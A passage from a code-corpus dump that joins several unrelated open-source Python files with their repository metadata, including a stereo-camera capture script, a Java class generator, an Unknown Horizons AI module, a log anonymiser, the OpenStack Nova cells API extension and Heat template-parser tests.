#folder = "D:/vision/stereo-calibration/calib_imgs/ARC/"
fp = open(folder + "timeStamp.txt","w")
WIDTH = 1280
HEIGHT = 720
WIDTH = 640
HEIGHT = 480
for counter in range(1,31):
millis = int(round(time.time() * 1000))
cap1 = cv2.VideoCapture(left)
cap1.set(cv2.CAP_PROP_FRAME_WIDTH,WIDTH)
cap1.set(cv2.CAP_PROP_FRAME_HEIGHT,HEIGHT)
cv2.waitKey(100)
ret, frame1 = cap1.read()
cap1.release()
cap2 = cv2.VideoCapture(right)
cap2.set(cv2.CAP_PROP_FRAME_WIDTH,WIDTH)
cap2.set(cv2.CAP_PROP_FRAME_HEIGHT,HEIGHT)
cv2.waitKey(100)
ret, frame2 = cap2.read()
cap2.release()
#frame1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
#frame2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)
# Display the resulting frame
plt.subplot(121)
plt.imshow(frame1)
plt.title('left')
plt.subplot(122)
plt.imshow(frame2)
plt.title('right')
plt.show()
print('another capture', counter)
cv2.waitKey(100)
cv2.imwrite(folder + "img_left/left_" + str(counter) + ".jpg", frame1)
cv2.waitKey(time_in_ms)
cv2.imwrite(folder + "img_right/right_" + str(counter) + ".jpg", frame2)
fp.write(str(counter)+ ","+ str(millis) + "\n")
print("the ", counter, " pairs")
cv2.destroyAllWindows()
fp.close()
print('All Done \n')
| mit | -5,414,921,834,074,587,000 | 25.929412 | 111 | 0.678462 | false |
dnikulin/jula | scripts/make_classes.py | 1 | 3287 | # Copyright (C) 2011 Dmitri Nikulin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common import SIZES, classname, mklabel, cells, startfile
def genmatrix(rows, cols):
myclass = classname(rows, cols)
fd = startfile("fixed", myclass)
def line(s=""):
print >> fd, s
traits = [("Matrix_%d_N" % rows), ("Matrix_M_%d" % cols)]
if (rows == cols):
traits.append("Matrix_M_M")
for trait in traits:
line("import org.dnikulin.jula.traits.%s;" % trait)
line()
line("import org.dnikulin.jula.functions.Copy;")
line()
line("public final class %s implements %s {" % (myclass, ", ".join(traits)))
line(" public static final int rows = %d;" % rows)
line(" public static final int cols = %d;" % cols)
line(" public static final int size = (rows * cols);")
line()
for row in range(rows):
labels = ", ".join([mklabel(row, col) for col in range(cols)])
line(" public double %s;" % labels)
line()
line(" @Override")
line(" public int getRows() {")
line(" return rows;")
line(" }")
line()
line(" @Override")
line(" public int getCols() {")
line(" return cols;")
line(" }")
line()
line(" @Override")
line(" public double get(final int row, final int col) {")
line(" assert(row >= 0);")
line(" assert(col >= 0);")
line(" assert(row < rows);")
line(" assert(col < cols);")
line()
line(" switch ((row * cols) + col) {")
for (row, col, label) in cells(rows, cols):
off = (row * cols) + col
line(" case %2d: return %s;" % (off, label))
line(" default: return 0;")
line(" }")
line(" }")
line()
line(" @Override")
line(" public void set(final int row, final int col, final double val) {")
line(" assert(row >= 0);")
line(" assert(col >= 0);")
line(" assert(row < rows);")
line(" assert(col < cols);")
line()
line(" switch ((row * cols) + col) {")
for (row, col, label) in cells(rows, cols):
off = (row * cols) + col
line(" case %2d: %s = val; return;" % (off, label))
line(" default: return;")
line(" }")
line(" }")
line()
line(" @Override")
line(" public %s clone() {" % (myclass))
line(" final %s that = new %s();" % (myclass, myclass))
line(" Copy.copy(this, that);")
line(" return that;")
line(" }")
line("}")
fd.flush()
fd.close()
if __name__ == '__main__':
for rows in SIZES:
for cols in SIZES:
genmatrix(rows, cols)
| apache-2.0 | -7,478,729,938,186,849,000 | 30.912621 | 81 | 0.531488 | false |
MarkusHackspacher/unknown-horizons | horizons/ai/aiplayer/building/firestation.py | 1 | 3179 | # ###################################################
# Copyright (C) 2008-2017 The Unknown Horizons Team
# [email protected]
# This file is part of Unknown Horizons.
#
# Unknown Horizons is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# ###################################################
from horizons.ai.aiplayer.basicbuilder import BasicBuilder
from horizons.ai.aiplayer.building import AbstractBuilding
from horizons.ai.aiplayer.buildingevaluator import BuildingEvaluator
from horizons.ai.aiplayer.constants import BUILDING_PURPOSE
from horizons.constants import BUILDINGS
class AbstractFireStation(AbstractBuilding):
def iter_potential_locations(self, settlement_manager):
spots_in_settlement = settlement_manager.settlement.buildability_cache.cache[(2, 2)]
village_builder = settlement_manager.village_builder
for coords in village_builder.special_building_assignments[BUILDING_PURPOSE.FIRE_STATION].keys():
if coords not in spots_in_settlement or village_builder.plan[coords][1][0] > village_builder.current_section:
continue
object = settlement_manager.settlement.ground_map[coords].object
if object is None or object.buildable_upon:
yield (coords[0], coords[1], 0)
@property
def producer_building(self):
"""Fire stations don't produce any resources."""
return False
@property
def evaluator_class(self):
return FireStationEvaluator
@classmethod
def register_buildings(cls):
cls._available_buildings[BUILDINGS.FIRE_STATION] = cls
class FireStationEvaluator(BuildingEvaluator):
need_collector_connection = False
record_plan_change = False
@classmethod
def create(cls, production_builder, x, y, orientation):
settlement_manager = production_builder.settlement_manager
village_builder = settlement_manager.village_builder
builder = BasicBuilder.create(BUILDINGS.FIRE_STATION, (x, y), orientation)
assigned_residences = village_builder.special_building_assignments[BUILDING_PURPOSE.FIRE_STATION][(x, y)]
total = len(assigned_residences)
not_serviced = 0
for residence_coords in assigned_residences:
if village_builder.plan[residence_coords][0] == BUILDING_PURPOSE.RESIDENCE:
not_serviced += 1
if not_serviced <= 0 or not_serviced < total * settlement_manager.owner.personality_manager.get('AbstractFireStation').fraction_of_assigned_residences_built:
return None
return FireStationEvaluator(village_builder, builder, not_serviced)
@property
def purpose(self):
return BUILDING_PURPOSE.FIRE_STATION
AbstractFireStation.register_buildings()
| gpl-2.0 | -1,032,238,161,009,814,300 | 38.246914 | 159 | 0.754954 | false |
EDUlib/eTracesX | Scripts/ExtractCours.py | 1 | 2359 | #!/usr/bin/python
import sys
import getopt
import re
import random
def main(argv):
inputfile = ''
outputfile = ''
try:
opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
except getopt.GetoptError:
print 'test.py -i <inputfile> -o <outputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> -o <outputfile>'
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
print 'Input file is :', inputfile
print 'Output file is :', outputfile
if inputfile == '' or outputfile == '':
sys.exit()
pUser =re.compile('"username": "([\w.@&\-]*)"')
pCours =re.compile('ITES\.1')
nameDict = dict()
f = open(inputfile, "r")
copy = open(outputfile, "w")
for line in f:
mCours = pCours.search(line)
if mCours:
mUser = pUser.findall(line)
newLine = ''
if len(mUser) == 1:
if mUser[0] != '':
if not nameDict.has_key(mUser[0]):
newName = ''.join(random.SystemRandom().choice('0123456789ABCDEF') for _ in range(16))
i = 0;
while (newName in nameDict.values()) and i < 1000:
newName = ''.join(random.SystemRandom().choice('0123456789ABCDEF') for _ in range(16))
i = i+1;
if i == 1000:
print "Can't find a name :", mUser[0]
sys.exit()
nameDict[mUser[0]] = newName;
# print 'Username is :', mUser[0], ' --- newName :', nameDict[mUser[0]]
newLine = re.sub('"username": "'+ mUser[0] + '"', '"username": "' + nameDict[mUser[0]] + '"', line)
# newLine = re.sub('"username": "'+ mUser[0] + '"', '"username": "' + mUser[0] + '"', line)
# newLine = line
else:
newLine = line
else:
print line
sys.exit()
if newLine != '':
copy.write(newLine)
f.close()
copy.close()
if __name__ == "__main__":
main(sys.argv[1:])
| agpl-3.0 | 3,712,799,693,199,665,700 | 34.208955 | 119 | 0.447647 | false |
imsplitbit/nova | nova/api/openstack/compute/contrib/cells.py | 1 | 15576 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The cells extension."""
from oslo.config import cfg
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova.cells import rpc_driver
from nova.cells import rpcapi as cells_rpcapi
from nova.compute import api as compute
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('capabilities', 'nova.cells.opts', group='cells')
authorize = extensions.extension_authorizer('compute', 'cells')
def make_cell(elem):
elem.set('name')
elem.set('username')
elem.set('type')
elem.set('rpc_host')
elem.set('rpc_port')
caps = xmlutil.SubTemplateElement(elem, 'capabilities',
selector='capabilities')
cap = xmlutil.SubTemplateElement(caps, xmlutil.Selector(0),
selector=xmlutil.get_items)
cap.text = 1
make_capacity(elem)
def make_capacity(cell):
def get_units_by_mb(capacity_info):
return capacity_info['units_by_mb'].items()
capacity = xmlutil.SubTemplateElement(cell, 'capacities',
selector='capacities')
ram_free = xmlutil.SubTemplateElement(capacity, 'ram_free',
selector='ram_free')
ram_free.set('total_mb', 'total_mb')
unit_by_mb = xmlutil.SubTemplateElement(ram_free, 'unit_by_mb',
selector=get_units_by_mb)
unit_by_mb.set('mb', 0)
unit_by_mb.set('unit', 1)
disk_free = xmlutil.SubTemplateElement(capacity, 'disk_free',
selector='disk_free')
disk_free.set('total_mb', 'total_mb')
unit_by_mb = xmlutil.SubTemplateElement(disk_free, 'unit_by_mb',
selector=get_units_by_mb)
unit_by_mb.set('mb', 0)
unit_by_mb.set('unit', 1)
cell_nsmap = {None: wsgi.XMLNS_V10}
class CellTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('cell', selector='cell')
make_cell(root)
return xmlutil.MasterTemplate(root, 1, nsmap=cell_nsmap)
class CellsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('cells')
elem = xmlutil.SubTemplateElement(root, 'cell', selector='cells')
make_cell(elem)
return xmlutil.MasterTemplate(root, 1, nsmap=cell_nsmap)
class CellDeserializer(wsgi.XMLDeserializer):
"""Deserializer to handle xml-formatted cell create requests."""
def _extract_capabilities(self, cap_node):
caps = {}
for cap in cap_node.childNodes:
cap_name = cap.tagName
caps[cap_name] = self.extract_text(cap)
return caps
def _extract_cell(self, node):
cell = {}
cell_node = self.find_first_child_named(node, 'cell')
extract_fns = {
'capabilities': self._extract_capabilities,
'rpc_port': lambda child: int(self.extract_text(child)),
}
for child in cell_node.childNodes:
name = child.tagName
extract_fn = extract_fns.get(name, self.extract_text)
cell[name] = extract_fn(child)
return cell
def default(self, string):
"""Deserialize an xml-formatted cell create request."""
node = xmlutil.safe_minidom_parse_string(string)
return {'body': {'cell': self._extract_cell(node)}}
def _filter_keys(item, keys):
"""
Filters all model attributes except for keys
item is a dict
"""
return dict((k, v) for k, v in item.iteritems() if k in keys)
def _fixup_cell_info(cell_info, keys):
"""
If the transport_url is present in the cell, derive username,
rpc_host, and rpc_port from it.
"""
if 'transport_url' not in cell_info:
return
# Disassemble the transport URL
transport_url = cell_info.pop('transport_url')
try:
transport = rpc_driver.parse_transport_url(transport_url)
except ValueError:
# Just go with None's
for key in keys:
cell_info.setdefault(key, None)
return cell_info
transport_field_map = {'rpc_host': 'hostname', 'rpc_port': 'port'}
for key in keys:
if key in cell_info:
continue
transport_field = transport_field_map.get(key, key)
cell_info[key] = transport[transport_field]
def _scrub_cell(cell, detail=False):
keys = ['name', 'username', 'rpc_host', 'rpc_port']
if detail:
keys.append('capabilities')
cell_info = _filter_keys(cell, keys + ['transport_url'])
_fixup_cell_info(cell_info, keys)
cell_info['type'] = 'parent' if cell['is_parent'] else 'child'
return cell_info
class Controller(object):
"""Controller for Cell resources."""
def __init__(self, ext_mgr):
self.compute_api = compute.API()
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.ext_mgr = ext_mgr
def _get_cells(self, ctxt, req, detail=False):
"""Return all cells."""
# Ask the CellsManager for the most recent data
items = self.cells_rpcapi.get_cell_info_for_neighbors(ctxt)
items = common.limited(items, req)
items = [_scrub_cell(item, detail=detail) for item in items]
return dict(cells=items)
@wsgi.serializers(xml=CellsTemplate)
def index(self, req):
"""Return all cells in brief."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req)
@wsgi.serializers(xml=CellsTemplate)
def detail(self, req):
"""Return all cells in detail."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req, detail=True)
@wsgi.serializers(xml=CellTemplate)
def info(self, req):
"""Return name and capabilities for this cell."""
context = req.environ['nova.context']
authorize(context)
cell_capabs = {}
my_caps = CONF.cells.capabilities
for cap in my_caps:
key, value = cap.split('=')
cell_capabs[key] = value
cell = {'name': CONF.cells.name,
'type': 'self',
'rpc_host': None,
'rpc_port': 0,
'username': None,
'capabilities': cell_capabs}
return dict(cell=cell)
@wsgi.serializers(xml=CellTemplate)
def capacities(self, req, id=None):
"""Return capacities for a given cell or all cells."""
# TODO(kaushikc): return capacities as a part of cell info and
# cells detail calls in v3, along with capabilities
if not self.ext_mgr.is_loaded('os-cell-capacities'):
raise exc.HTTPNotFound()
context = req.environ['nova.context']
authorize(context)
try:
capacities = self.cells_rpcapi.get_capacities(context,
cell_name=id)
except exception.CellNotFound:
msg = (_("Cell %(id)s not found.") % {'id': id})
raise exc.HTTPNotFound(explanation=msg)
return dict(cell={"capacities": capacities})
@wsgi.serializers(xml=CellTemplate)
def show(self, req, id):
"""Return data about the given cell name. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
cell = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound:
raise exc.HTTPNotFound()
return dict(cell=_scrub_cell(cell))
def delete(self, req, id):
"""Delete a child or parent cell entry. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
num_deleted = self.cells_rpcapi.cell_delete(context, id)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
if num_deleted == 0:
raise exc.HTTPNotFound()
return {}
def _validate_cell_name(self, cell_name):
"""Validate cell name is not empty and doesn't contain '!' or '.'."""
if not cell_name:
msg = _("Cell name cannot be empty")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
if '!' in cell_name or '.' in cell_name:
msg = _("Cell name cannot contain '!' or '.'")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _validate_cell_type(self, cell_type):
"""Validate cell_type is 'parent' or 'child'."""
if cell_type not in ['parent', 'child']:
msg = _("Cell type must be 'parent' or 'child'")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _normalize_cell(self, cell, existing=None):
"""
Normalize input cell data. Normalizations include:
* Converting cell['type'] to is_parent boolean.
* Merging existing transport URL with transport information.
"""
# Start with the cell type conversion
if 'type' in cell:
self._validate_cell_type(cell['type'])
cell['is_parent'] = cell['type'] == 'parent'
del cell['type']
# Avoid cell type being overwritten to 'child'
elif existing:
cell['is_parent'] = existing['is_parent']
else:
cell['is_parent'] = False
# Now we disassemble the existing transport URL...
transport = {}
if existing and 'transport_url' in existing:
transport = rpc_driver.parse_transport_url(
existing['transport_url'])
# Copy over the input fields
transport_field_map = {
'username': 'username',
'password': 'password',
'hostname': 'rpc_host',
'port': 'rpc_port',
'virtual_host': 'rpc_virtual_host',
}
for key, input_field in transport_field_map.items():
# Set the default value of the field; using setdefault()
# lets us avoid overriding the existing transport URL
transport.setdefault(key, None)
# Only override the value if we're given an override
if input_field in cell:
transport[key] = cell.pop(input_field)
# Now set the transport URL
cell['transport_url'] = rpc_driver.unparse_transport_url(transport)
@wsgi.serializers(xml=CellTemplate)
@wsgi.deserializers(xml=CellDeserializer)
def create(self, req, body):
"""Create a child cell entry."""
context = req.environ['nova.context']
authorize(context)
if 'cell' not in body:
msg = _("No cell information in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
cell = body['cell']
if 'name' not in cell:
msg = _("No cell name in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
self._validate_cell_name(cell['name'])
self._normalize_cell(cell)
try:
cell = self.cells_rpcapi.cell_create(context, cell)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@wsgi.serializers(xml=CellTemplate)
@wsgi.deserializers(xml=CellDeserializer)
def update(self, req, id, body):
"""Update a child cell entry. 'id' is the cell name to update."""
context = req.environ['nova.context']
authorize(context)
if 'cell' not in body:
msg = _("No cell information in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
cell = body['cell']
cell.pop('id', None)
if 'name' in cell:
self._validate_cell_name(cell['name'])
try:
# NOTE(Vek): There is a race condition here if multiple
# callers are trying to update the cell
# information simultaneously. Since this
# operation is administrative in nature, and
# will be going away in the future, I don't see
# it as much of a problem...
existing = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound:
raise exc.HTTPNotFound()
self._normalize_cell(cell, existing)
try:
cell = self.cells_rpcapi.cell_update(context, id, cell)
except exception.CellNotFound:
raise exc.HTTPNotFound()
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
def sync_instances(self, req, body):
"""Tell all cells to sync instance info."""
context = req.environ['nova.context']
authorize(context)
project_id = body.pop('project_id', None)
deleted = body.pop('deleted', False)
updated_since = body.pop('updated_since', None)
if body:
msg = _("Only 'updated_since', 'project_id' and 'deleted' are "
"understood.")
raise exc.HTTPBadRequest(explanation=msg)
if updated_since:
try:
timeutils.parse_isotime(updated_since)
except ValueError:
msg = _('Invalid changes-since value')
raise exc.HTTPBadRequest(explanation=msg)
self.cells_rpcapi.sync_instances(context, project_id=project_id,
updated_since=updated_since, deleted=deleted)
class Cells(extensions.ExtensionDescriptor):
"""Enables cells-related functionality such as adding neighbor cells,
listing neighbor cells, and getting the capabilities of the local cell.
"""
name = "Cells"
alias = "os-cells"
namespace = "http://docs.openstack.org/compute/ext/cells/api/v1.1"
updated = "2013-05-14T00:00:00+00:00"
def get_resources(self):
coll_actions = {
'detail': 'GET',
'info': 'GET',
'sync_instances': 'POST',
'capacities': 'GET',
}
memb_actions = {
'capacities': 'GET',
}
res = extensions.ResourceExtension('os-cells',
Controller(self.ext_mgr), collection_actions=coll_actions,
member_actions=memb_actions)
return [res]
| apache-2.0 | 7,603,201,070,921,146,000 | 34.806897 | 78 | 0.596944 | false |
Triv90/Heat | heat/tests/test_parser.py | 1 | 49333 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
from nose.plugins.attrib import attr
import mox
import uuid
from heat.common import context
from heat.common import exception
from heat.common import template_format
from heat.engine import resource
from heat.engine import parser
from heat.engine import parameters
from heat.engine import template
from heat.tests.utils import stack_delete_after
from heat.tests import generic_resource as generic_rsrc
import heat.db as db_api
def join(raw):
return parser.Template.resolve_joins(raw)
@attr(tag=['unit', 'parser'])
@attr(speed='fast')
class ParserTest(unittest.TestCase):
def test_list(self):
raw = ['foo', 'bar', 'baz']
parsed = join(raw)
for i in xrange(len(raw)):
self.assertEqual(parsed[i], raw[i])
self.assertTrue(parsed is not raw)
def test_dict(self):
raw = {'foo': 'bar', 'blarg': 'wibble'}
parsed = join(raw)
for k in raw:
self.assertEqual(parsed[k], raw[k])
self.assertTrue(parsed is not raw)
def test_dict_list(self):
raw = {'foo': ['bar', 'baz'], 'blarg': 'wibble'}
parsed = join(raw)
self.assertEqual(parsed['blarg'], raw['blarg'])
for i in xrange(len(raw['foo'])):
self.assertEqual(parsed['foo'][i], raw['foo'][i])
self.assertTrue(parsed is not raw)
self.assertTrue(parsed['foo'] is not raw['foo'])
def test_list_dict(self):
raw = [{'foo': 'bar', 'blarg': 'wibble'}, 'baz', 'quux']
parsed = join(raw)
for i in xrange(1, len(raw)):
self.assertEqual(parsed[i], raw[i])
for k in raw[0]:
self.assertEqual(parsed[0][k], raw[0][k])
self.assertTrue(parsed is not raw)
self.assertTrue(parsed[0] is not raw[0])
def test_join(self):
raw = {'Fn::Join': [' ', ['foo', 'bar', 'baz']]}
self.assertEqual(join(raw), 'foo bar baz')
def test_join_none(self):
raw = {'Fn::Join': [' ', ['foo', None, 'baz']]}
self.assertEqual(join(raw), 'foo baz')
def test_join_list(self):
raw = [{'Fn::Join': [' ', ['foo', 'bar', 'baz']]}, 'blarg', 'wibble']
parsed = join(raw)
self.assertEqual(parsed[0], 'foo bar baz')
for i in xrange(1, len(raw)):
self.assertEqual(parsed[i], raw[i])
self.assertTrue(parsed is not raw)
def test_join_dict_val(self):
raw = {'quux': {'Fn::Join': [' ', ['foo', 'bar', 'baz']]},
'blarg': 'wibble'}
parsed = join(raw)
self.assertEqual(parsed['quux'], 'foo bar baz')
self.assertEqual(parsed['blarg'], raw['blarg'])
self.assertTrue(parsed is not raw)
def test_join_recursive(self):
raw = {'Fn::Join': ['\n', [{'Fn::Join':
[' ', ['foo', 'bar']]}, 'baz']]}
self.assertEqual(join(raw), 'foo bar\nbaz')
mapping_template = template_format.parse('''{
"Mappings" : {
"ValidMapping" : {
"TestKey" : { "TestValue" : "wibble" }
},
"InvalidMapping" : {
"ValueList" : [ "foo", "bar" ],
"ValueString" : "baz"
},
"MapList": [ "foo", { "bar" : "baz" } ],
"MapString": "foobar"
}
}''')
@attr(tag=['unit', 'parser', 'template'])
@attr(speed='fast')
class TemplateTest(unittest.TestCase):
def setUp(self):
self.m = mox.Mox()
def tearDown(self):
self.m.UnsetStubs()
def test_defaults(self):
empty = parser.Template({})
try:
empty[template.VERSION]
except KeyError:
pass
else:
self.fail('Expected KeyError for version not present')
self.assertEqual(empty[template.DESCRIPTION], 'No description')
self.assertEqual(empty[template.MAPPINGS], {})
self.assertEqual(empty[template.PARAMETERS], {})
self.assertEqual(empty[template.RESOURCES], {})
self.assertEqual(empty[template.OUTPUTS], {})
def test_invalid_section(self):
tmpl = parser.Template({'Foo': ['Bar']})
try:
tmpl['Foo']
except KeyError:
pass
else:
self.fail('Expected KeyError for invalid template key')
def test_find_in_map(self):
tmpl = parser.Template(mapping_template)
find = {'Fn::FindInMap': ["ValidMapping", "TestKey", "TestValue"]}
self.assertEqual(tmpl.resolve_find_in_map(find), "wibble")
def test_find_in_invalid_map(self):
tmpl = parser.Template(mapping_template)
finds = ({'Fn::FindInMap': ["InvalidMapping", "ValueList", "foo"]},
{'Fn::FindInMap': ["InvalidMapping", "ValueString", "baz"]},
{'Fn::FindInMap': ["MapList", "foo", "bar"]},
{'Fn::FindInMap': ["MapString", "foo", "bar"]})
for find in finds:
self.assertRaises(KeyError, tmpl.resolve_find_in_map, find)
def test_bad_find_in_map(self):
tmpl = parser.Template(mapping_template)
finds = ({'Fn::FindInMap': "String"},
{'Fn::FindInMap': {"Dict": "String"}},
{'Fn::FindInMap': ["ShortList", "foo"]},
{'Fn::FindInMap': ["ReallyShortList"]})
for find in finds:
self.assertRaises(KeyError, tmpl.resolve_find_in_map, find)
def test_param_refs(self):
params = {'foo': 'bar', 'blarg': 'wibble'}
p_snippet = {"Ref": "foo"}
self.assertEqual(parser.Template.resolve_param_refs(p_snippet, params),
"bar")
def test_param_refs_resource(self):
params = {'foo': 'bar', 'blarg': 'wibble'}
r_snippet = {"Ref": "baz"}
self.assertEqual(parser.Template.resolve_param_refs(r_snippet, params),
r_snippet)
def test_param_ref_missing(self):
tmpl = {'Parameters': {'foo': {'Type': 'String', 'Required': True}}}
params = parameters.Parameters('test', tmpl)
snippet = {"Ref": "foo"}
self.assertRaises(exception.UserParameterMissing,
parser.Template.resolve_param_refs,
snippet, params)
def test_resource_refs(self):
resources = {'foo': self.m.CreateMock(resource.Resource),
'blarg': self.m.CreateMock(resource.Resource)}
resources['foo'].FnGetRefId().AndReturn('bar')
self.m.ReplayAll()
r_snippet = {"Ref": "foo"}
self.assertEqual(parser.Template.resolve_resource_refs(r_snippet,
resources),
"bar")
self.m.VerifyAll()
def test_resource_refs_param(self):
resources = {'foo': 'bar', 'blarg': 'wibble'}
p_snippet = {"Ref": "baz"}
self.assertEqual(parser.Template.resolve_resource_refs(p_snippet,
resources),
p_snippet)
def test_join_reduce(self):
join = {"Fn::Join": [" ", ["foo", "bar", "baz", {'Ref': 'baz'},
"bink", "bonk"]]}
self.assertEqual(
parser.Template.reduce_joins(join),
{"Fn::Join": [" ", ["foo bar baz", {'Ref': 'baz'}, "bink bonk"]]})
join = {"Fn::Join": [" ", ["foo", {'Ref': 'baz'},
"bink"]]}
self.assertEqual(
parser.Template.reduce_joins(join),
{"Fn::Join": [" ", ["foo", {'Ref': 'baz'}, "bink"]]})
join = {"Fn::Join": [" ", [{'Ref': 'baz'}]]}
self.assertEqual(
parser.Template.reduce_joins(join),
{"Fn::Join": [" ", [{'Ref': 'baz'}]]})
def test_join(self):
join = {"Fn::Join": [" ", ["foo", "bar"]]}
self.assertEqual(parser.Template.resolve_joins(join), "foo bar")
def test_join_string(self):
join = {"Fn::Join": [" ", "foo"]}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join)
def test_join_dict(self):
join = {"Fn::Join": [" ", {"foo": "bar"}]}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join)
def test_join_wrong_num_args(self):
join0 = {"Fn::Join": []}
self.assertRaises(ValueError, parser.Template.resolve_joins,
join0)
join1 = {"Fn::Join": [" "]}
self.assertRaises(ValueError, parser.Template.resolve_joins,
join1)
join3 = {"Fn::Join": [" ", {"foo": "bar"}, ""]}
self.assertRaises(ValueError, parser.Template.resolve_joins,
join3)
def test_join_string_nodelim(self):
join1 = {"Fn::Join": "o"}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join1)
join2 = {"Fn::Join": "oh"}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join2)
join3 = {"Fn::Join": "ohh"}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join3)
def test_join_dict_nodelim(self):
join1 = {"Fn::Join": {"foo": "bar"}}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join1)
join2 = {"Fn::Join": {"foo": "bar", "blarg": "wibble"}}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join2)
join3 = {"Fn::Join": {"foo": "bar", "blarg": "wibble", "baz": "quux"}}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join3)
def test_base64(self):
snippet = {"Fn::Base64": "foobar"}
# For now, the Base64 function just returns the original text, and
# does not convert to base64 (see issue #133)
self.assertEqual(parser.Template.resolve_base64(snippet), "foobar")
def test_base64_list(self):
list_snippet = {"Fn::Base64": ["foobar"]}
self.assertRaises(TypeError, parser.Template.resolve_base64,
list_snippet)
def test_base64_dict(self):
dict_snippet = {"Fn::Base64": {"foo": "bar"}}
self.assertRaises(TypeError, parser.Template.resolve_base64,
dict_snippet)
@attr(tag=['unit', 'parser', 'stack'])
@attr(speed='fast')
class StackTest(unittest.TestCase):
def setUp(self):
self.username = 'parser_stack_test_user'
self.m = mox.Mox()
self.ctx = context.get_admin_context()
self.m.StubOutWithMock(self.ctx, 'username')
self.ctx.username = self.username
self.ctx.tenant_id = 'test_tenant'
generic_rsrc.GenericResource.properties_schema = {}
resource._register_class('GenericResourceType',
generic_rsrc.GenericResource)
self.m.ReplayAll()
def tearDown(self):
self.m.UnsetStubs()
def test_state_defaults(self):
stack = parser.Stack(None, 'test_stack', parser.Template({}))
self.assertEqual(stack.state, None)
self.assertEqual(stack.state_description, '')
def test_state(self):
stack = parser.Stack(None, 'test_stack', parser.Template({}),
state='foo')
self.assertEqual(stack.state, 'foo')
stack.state_set('bar', '')
self.assertEqual(stack.state, 'bar')
def test_state_description(self):
stack = parser.Stack(None, 'test_stack', parser.Template({}),
state_description='quux')
self.assertEqual(stack.state_description, 'quux')
stack.state_set('blarg', 'wibble')
self.assertEqual(stack.state_description, 'wibble')
def test_load_nonexistant_id(self):
self.assertRaises(exception.NotFound, parser.Stack.load,
None, -1)
# Note tests creating a stack should be decorated with @stack_delete_after
# to ensure the self.stack is properly cleaned up
@stack_delete_after
def test_identifier(self):
self.stack = parser.Stack(self.ctx, 'identifier_test',
parser.Template({}))
self.stack.store()
identifier = self.stack.identifier()
self.assertEqual(identifier.tenant, self.ctx.tenant_id)
self.assertEqual(identifier.stack_name, 'identifier_test')
self.assertTrue(identifier.stack_id)
